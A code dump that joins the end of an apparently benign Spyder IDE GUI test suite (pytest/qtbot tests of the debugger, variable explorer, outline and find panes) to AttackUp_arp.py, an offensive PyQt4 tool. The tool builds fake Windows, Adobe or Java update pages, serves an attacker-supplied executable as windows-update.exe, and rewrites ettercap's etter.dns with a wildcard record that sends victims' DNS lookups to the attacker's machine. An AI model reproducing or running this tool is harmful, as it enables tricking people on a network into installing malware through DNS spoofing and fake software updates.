qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['a']['view'] == '10'
assert nsb.editor.source_model._data['b']['view'] == '10'
@pytest.mark.slow
@flaky(max_runs=3)
def test_post_mortem(main_window, qtbot, tmpdir):
"""Test post mortem works"""
# Check we can use custom complete for pdb
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
test_file = tmpdir.join('test.py')
test_file.write('raise RuntimeError\n')
with qtbot.waitSignal(shell.executed):
shell.execute(
"runfile(" + repr(str(test_file)) + ", post_mortem=True)")
assert "IPdb [" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_unsaved_file_multiprocessing(main_window, qtbot):
"""Test that we can run an unsaved file with multiprocessing."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"import multiprocessing\n"
"import traceback\n"
        'if __name__ == "__main__":\n'
" p = multiprocessing.Process(target=traceback.print_exc)\n"
" p.start()\n"
" p.join()\n"
)
    # This code should run even on Windows
# Start running
qtbot.mouseClick(run_button, Qt.LeftButton)
    # Because multiprocessing behaves strangely on Windows, only some
    # situations will work. This is one of those situations, so it shouldn't
    # be broken.
if os.name == 'nt':
qtbot.waitUntil(
lambda: "Warning: multiprocessing" in shell._control.toPlainText())
else:
# There is no exception, so the exception is None
qtbot.waitUntil(
lambda: 'None' in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_kernel_restart(main_window, qtbot):
"""
Test that the variable explorer is cleared after a kernel restart.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_reset(main_window, qtbot):
"""
Test that the variable explorer is cleared after triggering a
reset in the IPython console and variable explorer panes.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the variable explorer
nsb.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
# Create the variable again
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the console
shell.ipyclient.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_immediate_debug(main_window, qtbot):
"""
Check if we can enter debugging immediately
"""
shell = main_window.ipyconsole.get_current_shellwidget()
with qtbot.waitSignal(shell.executed, timeout=SHELL_TIMEOUT):
shell.execute("%debug print()")
@pytest.mark.slow
@flaky(max_runs=3)
def test_local_namespace(main_window, qtbot, tmpdir):
"""
Test that the local namespace is not reset.
This can happen if `frame.f_locals` is called on the current frame, as this
has the side effect of discarding the pdb locals.
"""
code = ("""
def hello():
test = 1
print('test ==', test)
hello()
""")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=4)
nsb = main_window.variableexplorer.current_widget()
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Check `test` has a value of 1
# Here we use "waitUntil" because `shell.executed` is emitted twice
# One at the beginning of the file, and once at the breakpoint
qtbot.waitUntil(lambda: 'test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '1',
timeout=3000)
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1")
# check value of test
with qtbot.waitSignal(shell.executed):
shell.execute("print('test =', test)")
assert "test = 2" in shell._control.toPlainText()
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1 + 1")
# do next
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!next")
assert "test == 3" in shell._control.toPlainText()
# Check the namespace browser is updated
assert ('test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '3')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
@pytest.mark.skipif(os.name == 'nt', reason='Times out on Windows')
def test_ordering_lsp_requests_at_startup(main_window, qtbot):
"""
Test the ordering of requests we send to the LSP at startup when a
project was left open during the previous session.
This is a regression test for spyder-ide/spyder#13351.
"""
# Wait until the LSP server is up.
code_editor = main_window.editor.get_current_editor()
qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000)
# Wait until the initial requests are sent to the server.
lsp = main_window.completions.get_provider('lsp')
python_client = lsp.clients['python']
qtbot.wait(5000)
expected_requests = [
'initialize',
'initialized',
'workspace/didChangeConfiguration',
'workspace/didChangeWorkspaceFolders',
'textDocument/didOpen',
]
skip_intermediate = {
'initialized': {'workspace/didChangeConfiguration'}
}
lsp_requests = python_client['instance']._requests
start_idx = lsp_requests.index((0, 'initialize'))
request_order = []
expected_iter = iter(expected_requests)
current_expected = next(expected_iter)
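    # Walk the recorded requests starting at 'initialize', checking that the
    # expected requests appear in order and allowing only the intermediate
    # requests listed in skip_intermediate between them.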
for i in range(start_idx, len(lsp_requests)):
if current_expected is None:
break
_, req_type = lsp_requests[i]
if req_type == current_expected:
request_order.append(req_type)
current_expected = next(expected_iter, None)
else:
            skip_set = skip_intermediate.get(current_expected, set())
if req_type in skip_set:
continue
else:
assert req_type == current_expected
assert request_order == expected_requests
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('tours', 'show_tour_message', 2)}],
indirect=True)
def test_tour_message(main_window, qtbot):
"""Test that the tour message displays and sends users to the tour."""
# Wait until window setup is finished, which is when the message appears
tours = main_window.get_plugin(Plugins.Tours)
tour_dialog = tours.get_container()._tour_dialog
animated_tour = tours.get_container()._tour_widget
qtbot.waitSignal(main_window.sig_setup_finished, timeout=30000)
# Check that tour is shown automatically and manually show it
assert tours.get_conf('show_tour_message')
tours.show_tour_message(force=True)
# Wait for the message to appear
qtbot.waitUntil(lambda: bool(tour_dialog), timeout=5000)
qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=2000)
# Check that clicking dismiss hides the dialog and disables it
qtbot.mouseClick(tour_dialog.dismiss_button, Qt.LeftButton)
qtbot.waitUntil(lambda: not tour_dialog.isVisible(),
timeout=2000)
assert not tours.get_conf('show_tour_message')
# Confirm that calling show_tour_message() normally doesn't show it again
tours.show_tour_message()
qtbot.wait(2000)
assert not tour_dialog.isVisible()
# Ensure that it opens again with force=True
tours.show_tour_message(force=True)
qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=5000)
# Run the tour and confirm it's running and the dialog is closed
qtbot.mouseClick(tour_dialog.launch_tour_button, Qt.LeftButton)
qtbot.waitUntil(lambda: animated_tour.is_running, timeout=9000)
assert not tour_dialog.isVisible()
assert not tours.get_conf('show_tour_message')
# Close the tour
animated_tour.close_tour()
qtbot.waitUntil(lambda: not animated_tour.is_running, timeout=9000)
tour_dialog.hide()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_complex_project
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Only works on Linux")
def test_update_outline(main_window, qtbot, tmpdir):
"""
Test that files in the Outline pane are updated at startup and
after switching projects.
"""
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer.toggle_view_action.setChecked(True)
# Get Python editor trees
treewidget = outline_explorer.get_widget().treewidget
editors_py = [
editor for editor in treewidget.editor_ids.keys()
if editor.get_language() == 'Python'
]
# Wait a bit for trees to be filled
qtbot.wait(25000)
# Assert all Python editors are filled
assert all(
[
len(treewidget.editor_tree_cache[editor.get_id()]) == 4
for editor in editors_py
]
)
# Split editor
editorstack = main_window.editor.get_current_editorstack()
editorstack.sig_split_vertically.emit()
qtbot.wait(1000)
# Select file with no outline in split editorstack
editorstack = main_window.editor.get_current_editorstack()
editorstack.set_stack_index(2)
editor = editorstack.get_current_editor()
assert osp.splitext(editor.filename)[1] == '.txt'
assert editor.is_cloned
# Assert tree is empty
editor_tree = treewidget.current_editor
tree = treewidget.editor_tree_cache[editor_tree.get_id()]
assert len(tree) == 0
# Assert spinner is not shown
assert not outline_explorer.get_widget()._spinner.isSpinning()
# Hide outline from view
outline_explorer.toggle_view_action.setChecked(False)
# Remove content from first file
editorstack.set_stack_index(0)
editor = editorstack.get_current_editor()
editor.selectAll()
editor.cut()
editorstack.save(index=0)
# Assert outline was not updated
qtbot.wait(1000)
    assert len(
        treewidget.editor_tree_cache[treewidget.current_editor.get_id()]) == 4
# Set some files as session without projects
prev_filenames = ["prev_file_1.py", "prev_file_2.py"]
prev_paths = []
for fname in prev_filenames:
file = tmpdir.join(fname)
file.write(read_asset_file("script_outline_1.py"))
prev_paths.append(str(file))
CONF.set('editor', 'filenames', prev_paths)
# Close project to open that file automatically
main_window.projects.close_project()
# Show outline again
outline_explorer.toggle_view_action.setChecked(True)
# Wait a bit for its tree to be filled
qtbot.wait(3000)
# Assert the editors were filled
assert all(
[
len(treewidget.editor_tree_cache[editor.get_id()]) == 4
for editor in treewidget.editor_ids.keys()
]
)
# Remove test file from session
CONF.set('editor', 'filenames', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_prevent_closing(main_window, qtbot):
"""
    Check that we can bypass the 'pdb_prevent_closing' option.
"""
code = "print(1 + 6)\nprint(1 + 6)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=1)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
CONF.set('ipython_console', 'pdb_prevent_closing', False)
# Check we can close a file we debug if the option is disabled
assert main_window.editor.get_current_editorstack().close_file()
CONF.set('ipython_console', 'pdb_prevent_closing', True)
# Check we are still debugging
assert shell.is_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
def test_continue_first_line(main_window, qtbot):
"""
    Check that the debugger does not stop on the first line when
    'pdb_stop_first_line' is disabled.
"""
code = "print('a =', 1 + 6)\nprint('b =', 1 + 8)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
CONF.set('ipython_console', 'pdb_stop_first_line', False)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# The debugging should finish
qtbot.waitUntil(lambda: not shell.is_debugging())
CONF.set('ipython_console', 'pdb_stop_first_line', True)
# Check everything was executed
qtbot.waitUntil(lambda: "a = 7" in shell._control.toPlainText())
assert "b = 9" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_outline_no_init(main_window, qtbot):
# Open file in one of our directories without an __init__ file
spy_dir = osp.dirname(get_module_path('spyder'))
main_window.editor.load(osp.join(spy_dir, 'tools', 'rm_whitespace.py'))
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer.toggle_view_action.setChecked(True)
# Wait a bit for trees to be filled
qtbot.wait(5000)
# Get tree length
treewidget = outline_explorer.get_widget().treewidget
editor_id = list(treewidget.editor_ids.values())[1]
# Assert symbols in the file are detected and shown
assert len(treewidget.editor_tree_cache[editor_id]) > 0
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="Flaky on Linux")
def test_pdb_without_comm(main_window, qtbot):
"""Check if pdb works without comm."""
ipyconsole = main_window.ipyconsole
shell = ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = ipyconsole.get_widget().get_focus_widget()
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm.close()")
shell.execute("%debug print()")
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, "print('Two: ' + str(1+1))")
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
assert "Two: 2" in control.toPlainText()
# Press step button and expect a sig_pdb_step signal
with qtbot.waitSignal(shell.sig_pdb_step):
main_window.editor.debug_command("step")
# Stop debugging and expect an executed signal
with qtbot.waitSignal(shell.executed):
main_window.editor.stop_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Flaky on Mac and Windows")
def test_print_comms(main_window, qtbot):
"""Test warning printed when comms print."""
# Write code with a cell to a file
code = ("class Test:\n @property\n def shape(self):"
"\n print((10,))")
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
nsb = main_window.variableexplorer.current_widget()
# Create some output from spyder call
with qtbot.waitSignal(shell.executed):
shell.execute(code)
assert nsb.editor.source_model.rowCount() == 0
with qtbot.waitSignal(shell.executed):
shell.execute("a = Test()")
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Make sure the warning is printed
assert ("Output from spyder call 'get_namespace_view':"
in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="UTF8 on Windows")
def test_goto_find(main_window, qtbot, tmpdir):
"""Test find goes to the right place."""
    # Use a non-ASCII (UTF-8) character to make sure positions are respected
code = "we Weee wee\nWe\n🚫 wee"
match_positions = [
(0, 2),
(3, 7),
(8, 11),
(12, 14),
(18, 21)
]
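    # The pairs above are (selectionStart, selectionEnd) character offsets;
    # the non-ASCII 🚫 character must count as a single position for the
    # last match to line up.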
subdir = tmpdir.mkdir("find-sub")
p = subdir.join("find-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
code_editor = main_window.editor.get_focus_widget()
main_window.explorer.chdir(str(subdir))
main_window.findinfiles.switch_to_plugin()
findinfiles = main_window.findinfiles.get_widget()
findinfiles.set_search_text("we+")
findinfiles.search_regexp_action.setChecked(True)
findinfiles.case_action.setChecked(False)
with qtbot.waitSignal(findinfiles.sig_finished, timeout=SHELL_TIMEOUT):
findinfiles.find()
results = findinfiles.result_browser.data
assert len(results) == 5
assert len(findinfiles.result_browser.files) == 1
file_item = list(findinfiles.result_browser.files.values())[0]
assert file_item.childCount() == 5
for i in range(5):
item = file_item.child(i)
findinfiles.result_browser.setCurrentItem(item)
findinfiles.result_browser.activated(item)
cursor = code_editor.textCursor()
position = (cursor.selectionStart(), cursor.selectionEnd())
assert position == match_positions[i]
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
os.name == 'nt',
reason="test fails on windows.")
def test_copy_paste(main_window, qtbot, tmpdir):
"""Test copy paste."""
code = (
"if True:\n"
" class a():\n"
" def b():\n"
" print()\n"
" def c():\n"
" print()\n"
)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Test copy
cursor = code_editor.textCursor()
cursor.setPosition(69)
cursor.movePosition(QTextCursor.End,
QTextCursor.KeepAnchor)
code_editor.setTextCursor(cursor)
qtbot.keyClick(code_editor, "c", modifier=Qt.ControlModifier)
assert QApplication.clipboard().text() == (
"def c():\n print()\n")
assert CLIPBOARD_HELPER.metadata_indent == 8
# Test paste in console
qtbot.keyClick(shell._control, "v", modifier=Qt.ControlModifier)
expected = "In [1]: def c():\n ...: print()"
assert expected in shell._control.toPlainText()
# Test paste at zero indentation
qtbot.keyClick(code_editor, Qt.Key_Backspace)
qtbot.keyClick(code_editor, Qt.Key_Backspace)
qtbot.keyClick(code_editor, Qt.Key_Backspace)
# Check again that the clipboard is ready
assert QApplication.clipboard().text() == (
"def c():\n print()\n")
assert CLIPBOARD_HELPER.metadata_indent == 8
qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier)
assert "\ndef c():\n print()" in code_editor.toPlainText()
# Test paste at automatic indentation
qtbot.keyClick(code_editor, "z", modifier=Qt.ControlModifier)
qtbot.keyClick(code_editor, Qt.Key_Tab)
qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier)
expected = (
"\n"
" def c():\n"
" print()\n"
)
assert expected in code_editor.toPlainText()
@pytest.mark.slow
@pytest.mark.skipif(not running_in_ci(), reason="Only works in CIs")
def test_add_external_plugins_to_dependencies(main_window):
"""Test that we register external plugins in the main window."""
external_names = []
for dep in DEPENDENCIES:
name = getattr(dep, 'package_name', None)
if name:
external_names.append(name)
assert 'spyder-boilerplate' in external_names
@pytest.mark.slow
@flaky(max_runs=3)
def test_print_multiprocessing(main_window, qtbot, tmpdir):
"""Test print commands from multiprocessing."""
# Write code with a cell to a file
code = """
import multiprocessing
import sys
def test_func():
print("Test stdout")
print("Test stderr", file=sys.stderr)
if __name__ == "__main__":
p = multiprocessing.Process(target=test_func)
p.start()
p.join()
"""
p = tmpdir.join("print-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Click the run button
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(run_button, Qt.LeftButton)
qtbot.wait(1000)
assert 'Test stdout' in control.toPlainText()
assert 'Test stderr' in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
os.name == 'nt',
reason="ctypes.string_at(0) doesn't segfaults on Windows")
def test_print_faulthandler(main_window, qtbot, tmpdir):
"""Test printing segfault info from kernel crashes."""
# Write code with a cell to a file
code = """
def crash_func():
import ctypes; ctypes.string_at(0)
crash_func()
"""
p = tmpdir.join("print-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Click the run button
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
qtbot.mouseClick(run_button, Qt.LeftButton)
qtbot.wait(5000)
assert 'Segmentation fault' in control.toPlainText()
assert 'in crash_func' in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("focus_to_editor", [True, False])
def test_focus_to_editor(main_window, qtbot, tmpdir, focus_to_editor):
"""Test that the focus_to_editor option works as expected."""
# Write code with cells to a file
code = """# %%
def foo(x):
return 2 * x
# %%
foo(1)
"""
p = tmpdir.join("test.py")
p.write(code)
# Load code in the editor
main_window.editor.load(to_text_string(p))
# Change focus_to_editor option
main_window.editor.set_option('focus_to_editor', focus_to_editor)
main_window.editor.apply_plugin_settings({'focus_to_editor'})
code_editor = main_window.editor.get_current_editor()
# Wait for the console to be up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Be sure the focus is on the editor before proceeding
code_editor.setFocus()
# Select the run cell button to click it
run_cell_action = main_window.run_toolbar_actions[1]
run_cell_button = main_window.run_toolbar.widgetForAction(run_cell_action)
# Make sure we don't switch to the console after pressing the button
if focus_to_editor:
with qtbot.assertNotEmitted(
main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000
):
qtbot.mouseClick(run_cell_button, Qt.LeftButton)
else:
qtbot.mouseClick(run_cell_button, Qt.LeftButton)
qtbot.wait(1000)
# Check the right widget has focus
focus_widget = QApplication.focusWidget()
if focus_to_editor:
assert focus_widget is code_editor
else:
assert focus_widget is control
# Give focus back to the editor before running the next test
if not focus_to_editor:
code_editor.setFocus()
# Move cursor to last line to run it
cursor = code_editor.textCursor()
cursor.movePosition(QTextCursor.End, QTextCursor.MoveAnchor)
cursor.movePosition(QTextCursor.PreviousBlock, QTextCursor.KeepAnchor)
code_editor.setTextCursor(cursor)
# Select the run selection button to click it
run_selection_action = main_window.run_toolbar_actions[3]
run_selection_button = main_window.run_toolbar.widgetForAction(
run_selection_action)
# Make sure we don't switch to the console after pressing the button
if focus_to_editor:
with qtbot.assertNotEmitted(
main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000
):
qtbot.mouseClick(run_selection_button, Qt.LeftButton)
else:
qtbot.mouseClick(run_selection_button, Qt.LeftButton)
qtbot.wait(1000)
# Check the right widget has focus
focus_widget = QApplication.focusWidget()
if focus_to_editor:
assert focus_widget is code_editor
else:
assert focus_widget is control
@pytest.mark.slow
@flaky(max_runs=3)
def test_focus_to_consoles(main_window, qtbot):
"""
Check that we give focus to the text widget of our consoles after focus
is given to their dockwidgets.
"""
# Wait for the console to be up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Show internal console
console = main_window.get_plugin(Plugins.Console)
console.toggle_view_action.setChecked(True)
# Change to the IPython console and assert focus is given to its focus
# widget
main_window.ipyconsole.dockwidget.raise_()
focus_widget = QApplication.focusWidget()
assert focus_widget is control
# Change to the Internal console and assert focus is given to its focus
# widget
console.dockwidget.raise_()
focus_widget = QApplication.focusWidget()
assert focus_widget is console.get_widget().get_focus_widget()
if __name__ == "__main__":
pytest.main()
|
AttackUp_arp.py
|
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from os import getcwd,popen,chdir,walk,path,remove,stat,getuid
from Module.DHCPstarvation import frm_dhcp_Attack,conf_etter
from platform import linux_distribution
from re import search
import threading
from shutil import copyfile
class frm_update_attack(QMainWindow):
def __init__(self, parent=None):
super(frm_update_attack, self).__init__(parent)
self.form_widget = frm_WinSoftUp(self)
self.setCentralWidget(self.form_widget)
sshFile="Core/dark_style.css"
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
self.setWindowTitle("Windows Update Attack Generator ")
self.setWindowIcon(QIcon('rsc/icon.ico'))
class frm_WinSoftUp(QWidget):
def __init__(self, parent=None):
super(frm_WinSoftUp, self).__init__(parent)
self.Main = QVBoxLayout()
self.control = None
self.module2 = frm_dhcp_Attack()
self.path_file = None
self.owd = getcwd()
self.GUI()
def GUI(self):
self.form = QFormLayout(self)
self.grid = QGridLayout(self)
self.grid1 = QGridLayout(self)
self.path = QLineEdit(self)
self.logBox = QListWidget(self)
self.path.setFixedWidth(400)
#combobox
self.cb_interface = QComboBox(self)
self.refresh_interface(self.cb_interface)
#label
self.lb_interface = QLabel("Network Adapter:")
# buttons
self.btn_open = QPushButton("...")
self.btn_stop = QPushButton("Stop",self)
self.btn_reload = QPushButton("refresh",self)
self.btn_start_server = QPushButton("Start Server",self)
# size
self.btn_open.setMaximumWidth(90)
self.btn_stop.setFixedHeight(50)
self.btn_start_server.setFixedHeight(50)
#icons
self.btn_open.setIcon(QIcon("rsc/open.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.btn_reload.setIcon(QIcon("rsc/refresh.png"))
self.btn_start_server.setIcon(QIcon("rsc/server.png"))
# connect buttons
self.btn_open.clicked.connect(self.getpath)
self.btn_reload.clicked.connect(self.inter_get)
self.btn_start_server.clicked.connect(self.server_start)
self.btn_stop.clicked.connect(self.stop_attack)
# radionButton
self.rb_windows = QRadioButton("Windows Update",self)
self.rb_windows.setIcon(QIcon("rsc/winUp.png"))
self.rb_adobe = QRadioButton("Adobe Update", self)
self.rb_adobe.setIcon(QIcon("rsc/adobe.png"))
self.rb_java = QRadioButton("Java Update", self)
self.rb_java.setIcon(QIcon("rsc/java.png"))
self.grid.addWidget(self.rb_windows, 0,1)
self.grid.addWidget(self.rb_adobe, 0,2)
self.grid.addWidget(self.rb_java, 0,3)
# check interface
self.grid.addWidget(self.lb_interface,1,1)
self.grid.addWidget(self.cb_interface,1,2)
self.grid.addWidget(self.btn_reload, 1,3)
#grid 2
self.grid1.addWidget(self.btn_start_server,0,2)
self.grid1.addWidget(self.btn_stop,0,4)
#form add layout
self.form.addRow(self.path,self.btn_open)
self.form.addRow(self.grid)
self.form.addRow(self.grid1)
self.form.addRow(self.logBox)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def stop_attack(self):
popen("killall xterm")
self.alt_etter("")
if path.isfile("Module/Win-Explo/Windows_Update/index.html"):
remove("Module/Win-Explo/Windows_Update/index.html")
if path.isfile("Module/Win-Explo/Windows_Update/windows-update.exe"):
remove("Module/Win-Explo/Windows_Update/windows-update.exe")
QMessageBox.information(self,"Clear Setting", "log cLear success ")
def inter_get(self):
self.refresh_interface(self.cb_interface)
def refresh_interface(self,cb):
self.module2 = frm_dhcp_Attack()
cb.clear()
n = self.module2.placa()
for i,j in enumerate(n):
if self.module2.get_ip_local(n[i]) != None:
if n[i] != "":
cb.addItem(n[i])
def server_start(self):
if len(self.path.text()) <= 0:
QMessageBox.information(self, "Path file Error", "Error in get the file path.")
else:
if self.rb_windows.isChecked():
directory = "Module/Win-Explo/Windows_Update/"
self.logBox.addItem("[+] Set page Attack.")
try:
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
copyfile(self.path_file,directory+"windows-update.exe")
except OSError,e:
print e
                if getuid() == 0:  # serving the fake update page requires root
file_html = open("Module/Win-Explo/Settings_WinUpdate.html","r").read()
settings_html = file_html.replace("KBlenfile", str(self.getSize(self.path_file))+"KB")
if path.isfile(directory+"index.html"):
remove(directory+"index.html")
confFile = open(directory+"index.html","w")
confFile.write(settings_html)
confFile.close()
self.t = threading.Thread(target=self.threadServer,args=(directory,),)
self.t.daemon = True
self.t.start()
else:
QMessageBox.information(self, "Permission Denied", 'the Tool must be run as root try again.')
self.logBox.clear()
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
def dns_start(self):
if self.control != None:
self.logBox.addItem("[+] Settings Etter.dns.")
ipaddress = self.module2.get_ip_local(str(self.cb_interface.currentText()))
config_dns = ("* A %s"%(ipaddress))
self.path_file_etter = self.find("etter.dns", "/etc/ettercap/")
self.logBox.addItem("[+] check Path Ettercap.")
            if self.path_file_etter is None:
                self.path_file_etter = self.find("etter.dns", "/usr/share/ettercap/")
            if self.path_file_etter is None:
                QMessageBox.information(self, 'Path not Found', "The file etter.dns was not found. Check that ettercap is installed.")
if self.path_file_etter != None:
self.alt_etter(config_dns)
self.thread2 = threading.Thread(target=self.ThreadDNS, args=(str(self.cb_interface.currentText()),))
self.thread2.daemon = True
self.thread2.start()
else:
            QMessageBox.information(self, 'Server Phishing Error', "Error: the phishing server did not start.")
def threadServer(self,directory):
self.logBox.addItem("[+] Get IP local network.")
ip = self.module2.get_ip_local(self.cb_interface.currentText())
try:
chdir(directory)
except OSError:
pass
popen("service apache2 stop")
self.control = 1
n = (popen("""xterm -geometry 75x15-1+0 -T "Windows Fake update " -e php -S %s:80"""%(ip))).read() + "exit"
chdir(self.owd)
while n != "dsa":
if n == "exit":
self.logBox.clear()
n = "dsa"
self.control = None
